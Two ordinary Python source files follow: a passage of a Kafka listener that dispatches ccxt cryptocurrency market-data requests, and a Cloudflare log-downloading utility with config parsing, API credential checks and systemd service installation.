class RequestListener(object):
def __init__(self, consumer, result_producer, status_producer, id, stop_event,
etcd_host, etcd_port, etcd_root):
self.id = id
self._consumer = consumer
self._result_producer = result_producer
self._status_producer = status_producer
self._stop_event = stop_event
self._thread = threading.Thread(target=self.run)
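        # Heartbeat: periodically publishes a liveness message for this listener on the status topic.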
self._heartbeat = heartbeatProducer.HeatbeatProducer(
status_producer = self._status_producer,
delay = 1, id = self.id,
stop_event = self._stop_event,
processor_type = PROCESSOR_TYPE
)
self._configuration_service = configurationService.EtcdConfigurationService(
etcd_host=etcd_host, etcd_port=etcd_port,
root=etcd_root,
id = self.id,
stop_event = STOP_THREADS,
processor_type = PROCESSOR_TYPE,
leader_election_enabled = False
)
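        # One request processor per "{lib}.{exchange}" pair, created lazily in process_request().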
self.processors = {}
def start(self):
logging.info("Start recieving msg from {}".format(
self._consumer.topics))
self._heartbeat.start()
self._configuration_service.start()
self._thread.start()
def run(self):
try:
self._consumer.consume(**{
"stop_event" : self._stop_event,
"callback": self.process_request
})
except Exception as ex:
logging.error("Error processing requests")
logging.error(ex)
logging.debug(traceback.format_exc())
finally:
for processor in self.processors.values():
processor.stop()
for processor in self.processors.values():
processor._thread.join()
def process_request(self, **kwargs):
        # Fetch the payload up front so the except handler below can always report it.
        request = kwargs.get('value')
        try:
            key = kwargs['key']
lib = request['lib']
exchange = request['exchange']
processor_key = "{}.{}".format(lib, exchange)
logging.debug("Received msg: {}".format(kwargs))
logging.info("Received msg: {}".format({k:kwargs[k] for k in kwargs if k not in set(['value'])}))
if processor_key in self.processors:
processor = self.processors[processor_key]
else:
if lib == "ccxt":
processor = CcxtRequestProcessor(
producer = self._result_producer,
status_producer = self._status_producer,
configuration_service = self._configuration_service,
listener_id = self.id,
exchange = exchange,
initial_key = key,
initial_request = request
)
self.processors[processor_key] = processor
processor.start()
else:
raise NotImplementedError("Library {} is not supported".format(lib))
processor.put(kwargs)
except Exception as ex:
msg = "Error processing request"
logging.error(msg)
logging.debug(ex)
trace = traceback.format_exc()
logging.debug(trace)
self._send_status_error(msg, self.id, request, ex, trace)
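    # Builds an error status message (id, result="exception", details, error flag, processor id)
    # and publishes it on the status topic so failed requests are visible to operators.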
def _send_status_error(self, msg, key, request, exception, trace):
try:
if isinstance(key, bytes):
try:
key = uuid.UUID(bytes=key)
except:
key = str(key)
status = {
"id" : key,
"result" : "exception",
"details" : {
"exception" : str(exception),
"type" : str(type(exception)),
"trace" : str(trace),
"request" : request,
"message" : msg
},
"error" : True,
"processor_id" : self.id
}
self._status_producer.send(key=key, value=status)
except Exception as ex:
logging.error("Error sending status")
logging.debug(ex)
logging.debug(traceback.format_exc())
@click.command()
@click.option('-b', '--bootstrap_servers', envvar='BOOTSTRAP_SERVERS', help='Kafka Servers')
@click.option('-o', '--result_topic', envvar='RESULT_TOPIC', default=RESULT_MARKET_DATA_TOPIC, help='Result Topic')
@click.option('-rid', '--request_id', envvar='REQUEST_ID', default=str(uuid.uuid1()), help='Control Id')
@click.option('-s', '--status_topic', envvar='STATUS_TOPIC', default=STATUS_TOPIC, help='Status Topic')
@click.option('-r', '--request_topic', envvar='REQUEST_TOPIC', default=REQUEST_MARKET_DATA_TOPIC, help='Request Topic')
@click.option('-eh', '--etcd_host', envvar='ETCD_HOST', default=configurationService.DEFAULT_HOST, help='etcd host')
@click.option('-ep', '--etcd_port', envvar='ETCD_PORT', default=configurationService.DEFAULT_PORT, help='etcd port')
@click.option('-er', '--etcd_root', envvar='ETCD_ROOT', default=configurationService.DEFAULT_ETCD_ROOT, help='etcd root')
def start_controller(bootstrap_servers, result_topic, request_id, status_topic, request_topic,
etcd_host, etcd_port, etcd_root):
    '''
    Consumer for periodic requests.
    Listens to REQUEST_TOPIC for requests on starting and controlling producers.
    Producers send their periodic results on the RESULT_TOPIC topic.
    '''
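    # A minimal sketch of a request message as read by RequestListener.process_request above.
    # Only the 'lib' and 'exchange' keys are confirmed by that code; the concrete values and
    # any extra fields are illustrative assumptions:
    #
    #   key   : a request id (bytes or UUID)
    #   value : {"lib": "ccxt", "exchange": "binance"}
    #
    # Requests with lib == "ccxt" are routed to a CcxtRequestProcessor; any other lib
    # raises NotImplementedError.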
REQUEST_MARKET_DATA_CONSUMER = simpleConsumer.Consumer(**{
"subscribe.topics" : [request_topic],
"value.deserializer" : simpleConsumer.value_deserializer,
"bootstrap.servers" : bootstrap_servers,
'group.id': request_id
})
RESULT_MARKET_DATA_PRODUCER = simpleProducer.Producer(**{
"value.serializer" : simpleProducer.value_serializer,
"bootstrap.servers" : bootstrap_servers,
"send.topic" : result_topic
})
STATUS_PRODUCER = simpleProducer.Producer(**{
"value.serializer" : simpleProducer.value_serializer,
"bootstrap.servers" : bootstrap_servers,
"send.topic" : status_topic
})
try:
processor = RequestListener(
consumer=REQUEST_MARKET_DATA_CONSUMER,
result_producer=RESULT_MARKET_DATA_PRODUCER,
status_producer=STATUS_PRODUCER,
id = uuid.uuid1(),
stop_event = STOP_THREADS,
etcd_host=etcd_host,
etcd_port=etcd_port,
etcd_root=etcd_root)
processor.start()
except:
STOP_THREADS.set()
logging.error(traceback.format_exc())
finally:
processor._thread.join()
def exit_gracefully(signum = None, frame = None):
STOP_THREADS.set()
if __name__ == '__main__':
signal.signal(signal.SIGINT, exit_gracefully)
signal.signal(signal.SIGTERM, exit_gracefully)
    start_controller() # pylint: disable=no-value-for-parameter
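# Example invocation (the broker address below is an assumption for illustration, not a value
# taken from this project); every option can also be set through its environment variable
# (BOOTSTRAP_SERVERS, REQUEST_TOPIC, RESULT_TOPIC, STATUS_TOPIC, ETCD_HOST, ...):
#
#   python tickerRequestConsumer.py -b localhost:9092 -r RequestMarketData -o ResultMarketData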
|
cf_logs_downloader.py
|
#!/usr/bin/env python3
#import libraries needed in this program
#'requests' library needs to be installed first
import requests, time, threading, os, json, logging, sys, argparse, logging.handlers, yaml, yschema, tempfile, signal, persistqueue
from datetime import datetime, timedelta
from pathlib import Path
from shutil import copy2
from gzip import decompress, compress
#specify version number of the program
ver_num = "2.7.2"
#a flag to determine whether the user wants to exit the program, so the program exit can be handled gracefully
is_exit = False
#determine how many logpull processes are running
num_of_running_thread = 0
#define the timestamp format that we supply to the Cloudflare API
timestamp_format = "rfc3339"
#the default sampling rate for the logs
sample_rate = 1
#initialize the variables to empty strings, so the other parts of the program can access them
log_type = zone_id = account_id = api_token = start_time = end_time = fields = final_fields = log_dest = ""
#the default value for the interval between each logpull process
interval = 60
#set the below settings to default: False
one_time = False
#specify the path to install the systemd service
service_path = '/etc/systemd/system/cf-logs-downloader.service'
'''
Specify the fields for the logs
The following fields are available: BotScore,BotScoreSrc,CacheCacheStatus,CacheResponseBytes,CacheResponseStatus,CacheTieredFill,ClientASN,ClientCountry,ClientDeviceType,ClientIP,ClientIPClass,ClientRequestBytes,ClientRequestHost,ClientRequestMethod,ClientRequestPath,ClientRequestProtocol,ClientRequestReferer,ClientRequestURI,ClientRequestUserAgent,ClientSSLCipher,ClientSSLProtocol,ClientSrcPort,ClientXRequestedWith,EdgeColoCode,EdgeColoID,EdgeEndTimestamp,EdgePathingOp,EdgePathingSrc,EdgePathingStatus,EdgeRateLimitAction,EdgeRateLimitID,EdgeRequestHost,EdgeResponseBytes,EdgeResponseCompressionRatio,EdgeResponseContentType,EdgeResponseStatus,EdgeServerIP,EdgeStartTimestamp,FirewallMatchesActions,FirewallMatchesRuleIDs,FirewallMatchesSources,OriginIP,OriginResponseHTTPExpires,OriginResponseHTTPLastModified,OriginResponseStatus,OriginResponseTime,OriginSSLProtocol,ParentRayID,RayID,RequestHeaders,SecurityLevel,WAFAction,WAFProfile,WAFRuleID,WAFRuleMessage,WorkerCPUTime,WorkerStatus,WorkerSubrequest,WorkerSubrequestCount,ZoneID
Deprecated log fields: OriginResponseBytes,WAFFlags,WAFMatchedVar
'''
http_fields = ["BotScore","BotScoreSrc","CacheCacheStatus","CacheResponseBytes","CacheResponseStatus","CacheTieredFill","ClientASN","ClientCountry","ClientDeviceType","ClientIP","ClientIPClass","ClientRequestBytes","ClientRequestHost","ClientRequestMethod","ClientRequestPath","ClientRequestProtocol","ClientRequestReferer","ClientRequestURI","ClientRequestUserAgent","ClientSSLCipher","ClientSSLProtocol","ClientSrcPort","ClientXRequestedWith","EdgeColoCode","EdgeColoID","EdgeEndTimestamp","EdgePathingOp","EdgePathingSrc","EdgePathingStatus","EdgeRateLimitAction","EdgeRateLimitID","EdgeRequestHost","EdgeResponseBytes","EdgeResponseCompressionRatio","EdgeResponseContentType","EdgeResponseStatus","EdgeServerIP","EdgeStartTimestamp","FirewallMatchesActions","FirewallMatchesRuleIDs","FirewallMatchesSources","OriginIP","OriginResponseHTTPExpires","OriginResponseHTTPLastModified","OriginResponseStatus","OriginResponseTime","OriginSSLProtocol","ParentRayID","RayID","RequestHeaders","SecurityLevel","WAFAction","WAFProfile","WAFRuleID","WAFRuleMessage","WorkerCPUTime","WorkerStatus","WorkerSubrequest","WorkerSubrequestCount","ZoneID"]
access_fields = ["action","allowed","app_domain","app_name","app_type","app_uid","connection","country","created_at","ip_address","purpose_justification_prompt","purpose_justification_response","ray_id","user_email","user_id"]
#create three logging objects for logging purposes
logger = logging.getLogger("general_logger") #for general logging
succ_logger = logging.getLogger("succ_logger") #to log successful attempts
fail_logger = logging.getLogger("fail_logger") #to log failed attempts
#the default logging level is INFO, which is one level higher than DEBUG
logger.setLevel(logging.INFO)
succ_logger.setLevel(logging.INFO)
fail_logger.setLevel(logging.INFO)
#create handlers to write logs to local storage, and automatically rotate them
Path("/var/log/cf_logs_downloader/").mkdir(parents=True, exist_ok=True)
handler_file = logging.handlers.TimedRotatingFileHandler("/var/log/cf_logs_downloader/pull.log", when='H', interval=1, backupCount=120, utc=False, encoding="utf-8") #rotate hourly, store up to 120 hours
succ_handler_file = logging.handlers.TimedRotatingFileHandler("/var/log/cf_logs_downloader/succ.log", when='D', interval=1, backupCount=30, utc=False, encoding="utf-8") #rotate daily, store up to 30 days
fail_handler_file = logging.handlers.TimedRotatingFileHandler("/var/log/cf_logs_downloader/fail.log", when='D', interval=1, backupCount=30, utc=False, encoding="utf-8") #rotate daily, store up to 30 days
#create a handler to print logs on terminal
handler_console = logging.StreamHandler()
#define the format of the logs for any logging event occurs
formatter = logging.Formatter("[%(levelname)s] %(message)s") #print log level with message
succfail_formatter = logging.Formatter("%(message)s") #print message only
#set the log format for all the handlers
handler_file.setFormatter(formatter)
handler_console.setFormatter(formatter)
succ_handler_file.setFormatter(succfail_formatter)
fail_handler_file.setFormatter(succfail_formatter)
#finally, add all handlers to their respective loggers
logger.addHandler(handler_console)
succ_logger.addHandler(succ_handler_file)
fail_logger.addHandler(fail_handler_file)
#create a SQLite queue system to handle failed tasks
queue = persistqueue.SQLiteQueue('/var/log/cf_logs_downloader/queue/', auto_commit=True, multithreading=True)
#create a threading event for wait() function
event = threading.Event()
'''
This is the starting point of the program. It will initialize the parameters supplied by the user and save it in a variable.
A help (welcome) message will be displayed if the user specifies -h or --help as a parameter.
If required parameters are not given by the user, an error message will be displayed to the user and the program will exit.
'''
def initialize_arg():
global log_type, zone_id, account_id, api_token, sample_rate, interval, logger, start_time_static, end_time_static, one_time, fields, final_fields, yaml_schema, log_dest
welcome_msg = "A little tool to pull/download HTTP or Cloudflare Access logs from Cloudflare and save it on local storage."
parsed_config = {}
#create an argparse object with the welcome message as the description
parser = argparse.ArgumentParser(description=welcome_msg)
#specify which arguments are available to use in this program. The usage of the arguments will be printed when the user tells the program to display help message.
parser.add_argument("-c", "--config", metavar="config.yml", help="Specify the path to the YAML configuration file.")
parser.add_argument("-a", "--account", metavar="ACCOUNT_ID", help="Specify the Cloudflare Account ID, if CF_ACCOUNT_ID environment variable not set. This will override CF_ACCOUNT_ID variable. Use only with 'access' log type.")
parser.add_argument("-z", "--zone", metavar="ZONE_ID", help="Specify the Cloudflare Zone ID, if CF_ZONE_ID environment variable not set. This will override CF_ZONE_ID variable. Use only with 'http' log type.")
parser.add_argument("-t", "--token", help="Specify your Cloudflare API Token, if CF_TOKEN environment variable not set. This will override CF_TOKEN variable.")
parser.add_argument("-r", "--rate", help="Specify the log sampling rate from 0.01 to 1. Default is 1. Only applicable for 'http' log type.", type=float)
parser.add_argument("-i", "--interval", help="Specify the interval between each logpull in seconds. Default is 60 seconds.", type=int)
parser.add_argument("-n", "--nice", help="Specify the niceness of the logpull process from -20 (highest priority) to 19 (lowest priority). Default is -10.", type=int)
parser.add_argument("--type", help="Specify the type of logs that you would like to pull. Possible values: http (for HTTP logs), access (for Cloudflare Access logs)")
parser.add_argument("--path", metavar="/log/path/", help="Specify the path to store logs. By default, it will save to /var/log/cf_logs/.")
parser.add_argument("--prefix", help="Specify the prefix name of the logfile being stored on local storage. By default, the file name will begins with cf_logs.")
parser.add_argument("--no-organize", help="Instruct the program to store raw logs as is, without organizing them into date and time folder.", action="store_true")
parser.add_argument("--no-gzip", help="Do not compress the raw logs.", action="store_true")
parser.add_argument("--one-time", help="Only pull logs from Cloudflare for one time, without scheduling capability. You must specify the start time and end time of the logs to be pulled from Cloudflare.", action="store_true")
parser.add_argument("--start-time", help="Specify the start time of the logs to be pulled from Cloudflare. The start time is inclusive. You must follow the ISO 8601 (RFC 3339) date format, in UTC timezone. Example: 2020-12-31T12:34:56Z")
parser.add_argument("--end-time", help="Specify the end time of the logs to be pulled from Cloudflare. The end time is exclusive. You must follow the ISO 8601 (RFC 3339) date format, in UTC timezone. Example: 2020-12-31T12:35:00Z")
parser.add_argument("--exclude", metavar="field1,field2", help="Specify the list of log fields to be excluded from Logpull. Separate each field by comma without spaces. Only applicable for 'http' log type.")
parser.add_argument("--available-fields", metavar="TYPE", help="Specify the log type to display the list of available log fields used by the program. These fields are also included in the logpull by default (unless field exclusion is configured). Possible values: http | access.")
parser.add_argument("--install-service", help="Install the program as a systemd service. The service will execute the program from the path where you install the service.", action="store_true")
parser.add_argument("--uninstall-service", help="Uninstall the systemd service.", action="store_true")
parser.add_argument("--list-queue", help="List all the pending tasks in the queue which has failed before, without beautifying the result (raw JSON).", action="store_true")
parser.add_argument("--list-queue-beauty", help="List all the pending tasks in the queue which has failed before, with beautifying the result.", action="store_true")
parser.add_argument("--queue-size", help="Display the number of pending tasks in the queue which has failed before.", action="store_true")
parser.add_argument("--debug", help="Enable debugging functionality.", action="store_true")
parser.add_argument("-v", "--version", help="Show program version.", action="version", version="Version " + ver_num)
#parse the parameters supplied by the user, and check whether the parameters match the one specified above
#if it does not match, an error message will be given to the user and the program will exit
args = parser.parse_args()
one_time = args.one_time
#only allow writing activity logs to disk when the user does not use one time operation.
if one_time is False:
logger.addHandler(handler_file)
#if user specifies this parameter, list the queue as it is without any beautification and sorting
if args.list_queue:
print(json.dumps(queue.queue(), default=str))
sys.exit(0)
#if user specifies this parameter, list the queue with beautification and sorting based on log_start_time_utc
if args.list_queue_beauty:
print(json.dumps(sorted(queue.queue(), key=sort_json_by_log_start_time_utc), default=str, indent=2))
sys.exit(0)
#if user specifies this parameter, display the current size of the queue (how many items in the queue)
if args.queue_size:
print(str(queue.size))
sys.exit(0)
    #catch someone who tries to both install and uninstall the service, which makes no sense.
if args.install_service and args.uninstall_service:
logger.critical(str(datetime.now()) + " --- Hold on. Are you trying to install or uninstall service?")
sys.exit(2)
#attempt to install service as requested by the user
if args.install_service:
#the user can also specify the location of the existing config file so that the config file can be copied directly to /etc/cf-logs-downloader/.
config_path = args.config if args.config else False
install_service(config_path)
#attempt to uninstall service as requested by the user
if args.uninstall_service:
uninstall_service()
#return the list of available fields by joining each field together as a string with ',' as delimiter
if args.available_fields:
if args.available_fields == 'http':
print(','.join(field for field in http_fields))
sys.exit(0)
elif args.available_fields == 'access':
print(','.join(field for field in access_fields))
sys.exit(0)
else:
logger.critical(str(datetime.now()) + " --- No log fields for log type '" + log_type + "'. Valid values: http | access")
sys.exit(2)
#check if user specifies the path to configuration file, if yes, attempt read settings from the configuration file
if args.config:
#check if configuration file exists. if not, display an error and exit.
try:
config_file = open(args.config, mode="r", encoding="utf-8")
except Exception as e:
logger.critical(str(datetime.now()) + " --- Error while opening " + args.config + ": " + str(e) + ".")
sys.exit(2)
#if able to open the configuration file, load and parse the YAML data into Python dictionary.
#if unable to parse the YAML data, display an error and exit.
try:
parsed_config = yaml.safe_load(config_file)
except Exception as e:
logger.critical(str(datetime.now()) + " --- Error parsing configuration file: " + str(e))
sys.exit(2)
finally:
config_file.close()
#retrieve the YAML schema from the schema file
yaml_schema = get_yaml_schema()
#check if the configuration follows the schema. If not, display an error and exit.
try:
yschema.validate(parsed_config, yaml_schema)
except yschema.exceptions.ValidationError as e:
logger.critical(str(datetime.now()) + " --- Error in configuration file: " + str(e) + ". Please check whether the settings are correct.")
sys.exit(2)
#enable debugging if specified by the user
if args.debug is True or parsed_config.get("debug") is True:
logger.setLevel(logging.DEBUG)
#check whether the log type is specified by the user via the parameter. If not, check the environment variable.
#if not in environment variable, then check the config file.
#priority of reading log type: arguments - environment variable - config file.
#if no log type is specified, an error message will be given to the user and the program will exit
if args.type:
log_type = args.type
elif os.getenv("CF_LOG_TYPE"):
log_type = os.getenv("CF_LOG_TYPE")
elif parsed_config.get("type"):
log_type = parsed_config.get("type")
else:
logger.critical(str(datetime.now()) + " --- Please specify the type of logs you want to pull. Possible values: http | access")
sys.exit(2)
#check either zone ID or account ID based on the log type the user specified. HTTP logs only require zone ID, while Cloudflare Access logs only require account ID.
if log_type == "http":
#immediately assign the http fields list to a new variable, future reference of log fields will be the new variable
fields = http_fields
#check whether Zone ID is given by the user via the parameter. If not, check the environment variable.
#if not in environment variable, then check the config file.
#priority of reading Zone ID: arguments - environment variable - config file.
#if no Zone ID is given, an error message will be given to the user and the program will exit
if args.zone:
zone_id = args.zone
elif os.getenv("CF_ZONE_ID"):
zone_id = os.getenv("CF_ZONE_ID")
elif parsed_config.get("cf_zone_id"):
zone_id = parsed_config.get("cf_zone_id")
else:
logger.critical(str(datetime.now()) + " --- Please specify your Cloudflare Zone ID.")
sys.exit(2)
#check if user provides the sample rate value in command line as argument, if not, check the config file.
#if not exist in config file, use the default value.
        #priority of reading sample rate: arguments - config file - default value (1).
if args.rate:
sample_rate = args.rate
elif parsed_config.get("rate"):
sample_rate = parsed_config.get("rate")
#check whether the sample rate is valid, if not return an error message and exit
try:
            #the value should not have more than two decimal places
if len(str(sample_rate).split(".", 1)[1]) > 2:
logger.critical(str(datetime.now()) + " --- Invalid sample rate specified. Please specify a value between 0.01 and 1, and only two decimal places allowed.")
sys.exit(2)
except IndexError:
#sometimes the user may specify 1 as the value, so we need to handle the exception for value with no decimal places
pass
if sample_rate <= 1.0 and sample_rate >= 0.01:
sample_rate = str(sample_rate)
else:
logger.critical(str(datetime.now()) + " --- Invalid sample rate specified. Please specify a value between 0.01 and 1, and only two decimal places allowed.")
sys.exit(2)
elif log_type == "access":
#immediately assign the Access fields list to a new variable, future reference of log fields will be the new variable
fields = access_fields
#check whether Account ID is given by the user via the parameter. If not, check the environment variable.
#if not in environment variable, then check the config file.
#priority of reading Account ID: arguments - environment variable - config file.
#if no Account ID is given, an error message will be given to the user and the program will exit
if args.account:
account_id = args.account
elif os.getenv("CF_ACCOUNT_ID"):
account_id = os.getenv("CF_ACCOUNT_ID")
elif parsed_config.get("cf_account_id"):
account_id = parsed_config.get("cf_account_id")
else:
logger.critical(str(datetime.now()) + " --- Please specify your Cloudflare Account ID.")
sys.exit(2)
#display a warning to the user if the user specifies sample rate while using Cloudflare Access log type.
if args.rate or parsed_config.get("rate"):
logger.warning(str(datetime.now()) + " --- Cloudflare Access log does not support sampling. Sample rate will be ignored.")
else:
logger.critical(str(datetime.now()) + " --- Invalid log type '" + log_type + "'. Valid values: http | access")
sys.exit(2)
#check whether Cloudflare API Token is given by the user via the parameter. If not, check the environment variable.
#if not in environment variable, then check the config file.
#priority of reading Cloudflare API Token: arguments - environment variable - config file.
#if no Cloudflare API Token is given, an error message will be given to the user and the program will exit
if args.token:
api_token = args.token
elif os.getenv("CF_TOKEN"):
api_token = os.getenv("CF_TOKEN")
elif parsed_config.get("cf_token"):
api_token = parsed_config.get("cf_token")
else:
logger.critical(str(datetime.now()) + " --- Please specify your Cloudflare API Token.")
sys.exit(2)
#if the user wants to do one-time operation, check the correctness of the start time and end time of the logs to pull.
if one_time is True:
if args.start_time and args.end_time:
try:
start_time_static = datetime.strptime(args.start_time, "%Y-%m-%dT%H:%M:%SZ")
end_time_static = datetime.strptime(args.end_time, "%Y-%m-%dT%H:%M:%SZ")
diff_start_end = end_time_static - start_time_static
diff_to_now = datetime.utcnow() - end_time_static
if diff_start_end.total_seconds() < 1:
logger.critical(str(datetime.now()) + " --- Start time must be earlier than the end time by at least 1 second. ")
sys.exit(2)
if log_type == "http":
if diff_to_now.total_seconds() < 60:
logger.critical(str(datetime.now()) + " --- Please specify an end time that is 60 seconds or more earlier than the current time.")
sys.exit(2)
elif log_type == "access":
if diff_to_now.total_seconds() < 1:
logger.critical(str(datetime.now()) + " --- Please specify an end time that is 1 second or more earlier than the current time.")
sys.exit(2)
except ValueError:
logger.critical(str(datetime.now()) + " --- Invalid date format specified. Make sure it is in RFC 3339 date format, in UTC timezone. Please refer to the example: 2020-12-31T12:34:56Z")
sys.exit(2)
else:
logger.critical(str(datetime.now()) + " --- No start time or end time specified for one-time operation. ")
sys.exit(2)
#check if user specifies interval in the command line as parameter. If not, check the config file. Else, use the default value.
#priority of reading interval value: arguments - config file - default value (60).
if args.interval:
interval = args.interval
elif parsed_config.get("interval"):
interval = parsed_config.get("interval")
#check if user specifies niceness in the command line as parameter. If not, check the config file. Else, use the default value.
    #priority of reading niceness value: arguments - config file - default value (-10).
#niceness value must be between -20 to 19.
try:
        if args.nice is not None:
if args.nice < -20 :
logger.warning(str(datetime.now()) + " --- The value of niceness is too small. Setting the value to -20.")
os.nice(-20)
elif args.nice > 19 :
logger.warning(str(datetime.now()) + " --- The value of niceness is too large. Setting the value to 19.")
os.nice(19)
else:
os.nice(args.nice)
elif parsed_config.get("nice"):
if parsed_config.get("nice") < -20 :
logger.warning(str(datetime.now()) + " --- The value of niceness is too small. Setting the value to -20.")
os.nice(-20)
elif parsed_config.get("nice") > 19 :
logger.warning(str(datetime.now()) + " --- The value of niceness is too large. Setting the value to 19.")
os.nice(19)
else:
os.nice(parsed_config.get("nice"))
else:
os.nice(-10)
except Exception as e:
logger.warning(str(datetime.now()) + " --- Unable to set niceness value of the logpull process: " + str(e) + ".")
#check if the user specifies log path and logfile prefix in command line arguments. If yes, override everything specified in the config file.
if args.path or args.prefix:
log_dest = [{'name': 'default', 'path': args.path if args.path else '/var/log/cf_logs/', 'prefix': args.prefix if args.prefix else 'cf_logs', 'no_organize': False, 'no_gzip': False}]
    #else if there's a log destination configuration in the config file, then get the value from it
elif parsed_config.get("log_dest"):
log_dest = parsed_config.get("log_dest")
#else, use the default value
else:
log_dest = [{'name': 'default', 'path': '/var/log/cf_logs/', 'prefix': 'cf_logs', 'no_organize': False, 'no_gzip': False}]
#if the user specifies True either as command line arguments or inside config file, then we assume the user wants to turn on the option.
for i in range(len(log_dest)):
log_dest[i]['no_organize'] = True if args.no_organize is True else log_dest[i].get('no_organize')
log_dest[i]['no_gzip'] = True if args.no_gzip is True else log_dest[i].get('no_gzip')
#only perform field exclusion on HTTP log type
if log_type == "http":
#exclude certain fields in logpull
if args.exclude:
list_exclude_field = "".join(args.exclude.split()) #remove all whitespaces
list_exclude_field = list_exclude_field.split(',') #
for exclude_field in list_exclude_field:
fields.remove(exclude_field)
elif parsed_config.get('fields.exclude'):
for exclude_field in parsed_config.get('fields.exclude'):
fields.remove(exclude_field)
final_fields = ','.join(field for field in fields)
elif log_type == "access":
if args.exclude or parsed_config.get('fields.exclude'):
logger.warning(str(datetime.now()) + " --- Cloudflare Access log does not support exclusion of log fields. All fields will be included in the log. Field exclusion will be ignored. Specify '--available-fields access' parameter to view the list of Cloudflare Access log fields.")
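'''
A minimal sketch of a YAML configuration file accepted by initialize_arg() above.
Only keys that the code actually reads are listed; the concrete values are illustrative
assumptions, and the authoritative schema is defined in schema.yml.
    type: http                        # or: access
    cf_zone_id: <zone id>             # required for the 'http' log type
    cf_account_id: <account id>       # required for the 'access' log type
    cf_token: <api token>
    rate: 1                           # sampling rate, 0.01-1.00, 'http' only
    interval: 60                      # seconds between each logpull
    nice: -10
    debug: false
    log_dest:
      - name: default
        path: /var/log/cf_logs/
        prefix: cf_logs
        no_organize: false
        no_gzip: false
'''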
'''
This method is to retrieve the YAML schema from the schema file (schema.yml), and return the value of the schema to the caller.
'''
def get_yaml_schema():
try:
yaml_schema_file = open('schema.yml', mode='r', encoding='utf-8')
yaml_schema = yaml.safe_load(yaml_schema_file)
yaml_schema_file.close()
return yaml_schema
except FileNotFoundError:
logger.critical(str(datetime.now()) + " --- Unable to parse YAML schema: schema.yml file not found. Clone the repository from Github, or download the release file and try again.")
sys.exit(2)
except Exception as e:
logger.critical(str(datetime.now()) + " --- Unable to parse YAML schema: " + str(e) + ". Clone the repository from Github, or download the release file and try again.")
sys.exit(2)
'''
This method sorts the incoming JSON object (task queue) by log_start_time_utc.
'''
def sort_json_by_log_start_time_utc(value):
return value["data"]["log_start_time_utc"]
'''
This method will install the tool as a systemd service.
'''
def install_service(config_path):
service_desc = '''\
[Unit]
Description=A little tool to pull/download HTTP or Cloudflare Access logs from Cloudflare and save it on local storage.
After=network.target
StartLimitIntervalSec=0
[Service]
Type=simple
Restart=always
RestartSec=1
User=root
ExecStart={cwd}/cf_logs_downloader.py --config {config_file}
[Install]
WantedBy=multi-user.target\
'''.format(cwd=os.getcwd(), config_file=config_path)
try:
#try write the service file
service_file = open(service_path, mode='w', encoding="utf-8")
service_file.write(service_desc)
service_file.close()
#reload the systemd after adding new service
os.system("systemctl daemon-reload")
#check if the user specifies the config file path. If yes, copy the config file and paste it into /etc/cf-logs-downloader/.
if config_path:
logger.info(str(datetime.now()) + " --- Successfully installed service as " + service_path + ".")
try:
copy2(config_path, '/etc/cf-logs-downloader/config.yml')
logger.info(str(datetime.now()) + " --- Successfully copied the config file to /etc/cf-logs-downloader/config.yml.")
except IOError as io_err:
os.makedirs(os.path.dirname('/etc/cf-logs-downloader/'))
copy2(config_path, '/etc/cf-logs-downloader/config.yml')
logger.info(str(datetime.now()) + " --- Successfully copied the config file to /etc/cf-logs-downloader/config.yml.")
else:
logger.info(str(datetime.now()) + " --- Successfully installed service as " + service_path + ". Ensure that the config file is located in /etc/cf-logs-downloader/config.yml before you start the service.")
logger.info(str(datetime.now()) + " --- Enable the service by using this command: systemctl enable cf-logs-downloader")
logger.info(str(datetime.now()) + " --- Start the service by using this command: systemctl start cf-logs-downloader")
sys.exit(0)
except Exception as e:
logger.critical(str(datetime.now()) + " --- Error while installing service as " + service_path + ":" + str(e) + ".")
sys.exit(126)
'''
This method will uninstall the systemd service.
'''
def uninstall_service():
if os.path.exists(service_path):
try:
#disable the service first before deleting the service.
os.system("systemctl disable cf-logs-downloader")
os.remove(service_path)
#reload the systemd service after deleting the service.
os.system("systemctl daemon-reload")
logger.info(str(datetime.now()) + " --- Successfully uninstalled the service.")
sys.exit(0)
except Exception as e:
logger.critical(str(datetime.now()) + " --- Error while uninstalling service:" + str(e) + ". You may remove the service manually by deleting " + service_path + ".")
sys.exit(126)
else:
logger.critical(str(datetime.now()) + " --- The service was not installed previously. Abort.")
sys.exit(126)
'''
This method will be invoked after initialize_arg().
This method is to verify whether the Cloudflare Zone ID/Account ID (depending on the log type) and Cloudflare API Token given by the user is valid.
If it is not valid, an error message will be given to the user and the program will exit
'''
def verify_credential():
global logger
if log_type == "http":
#specify the Cloudflare API URL to check the Zone ID and API Token
url = "https://api.cloudflare.com/client/v4/zones/" + zone_id + "/logs/received"
headers = {"Authorization": "Bearer " + api_token, "Content-Type": "application/json"}
#make a HTTP request to the Cloudflare API
try:
r = requests.get(url, headers=headers)
r.encoding = "utf-8"
except Exception as e:
logger.critical(str(datetime.now()) + " --- Unable to perform API request to Cloudflare: " + str(e))
sys.exit(2)
#if there's an error, Cloudflare API will return a JSON object to indicate the error
#and if it's not, a plain text will be returned instead
#the try except block is to catch any errors raised by json.loads(), in case Cloudflare is not returning JSON object
try:
response = json.loads(r.text)
if response["success"] is False:
logger.critical(str(datetime.now()) + " --- Failed to authenticate with Cloudflare API. Please check your Zone ID and Cloudflare API Token.")
sys.exit(2)
except json.JSONDecodeError:
#a non-JSON object returned by Cloudflare indicates that authentication successful
pass
elif log_type == 'access':
#specify the Cloudflare API URL to check the Account ID and API Token
url = "https://api.cloudflare.com/client/v4/accounts/" + account_id + "/access/logs/access_requests"
headers = {"Authorization": "Bearer " + api_token, "Content-Type": "application/json"}
#make a HTTP request to the Cloudflare API
try:
r = requests.get(url, headers=headers)
r.encoding = "utf-8"
except Exception as e:
logger.critical(str(datetime.now()) + " --- Unable to perform API request to Cloudflare: " + str(e))
sys.exit(2)
#Cloudflare API should always return a JSON object to indicate whether the request is successful or not.
#the try except block is to catch any errors raised by json.loads(), in case Cloudflare is not returning JSON object
try:
response = json.loads(r.text)
if response["success"] is False:
logger.critical(str(datetime.now()) + " --- Failed to authenticate with Cloudflare API. Please check your Account ID and Cloudflare API Token.")
sys.exit(2)
else:
#no errors. Can proceed with logpull.
pass
except json.JSONDecodeError as e:
logger.critical(str(datetime.now()) + " --- Unable to perform API request to Cloudflare: " + str(e))
'''
This method initializes the folder on local storage that will hold the logs, using the date and time of the logs as the folder name.
If the folder does not exist, it will automatically create a new one
'''
def initialize_folder(path_with_date):
data_folder = Path(path_with_date)
data_folder.mkdir(parents=True, exist_ok=True)
return data_folder
'''
This method prepares the path where the logfile will be stored and the name of the logfile.
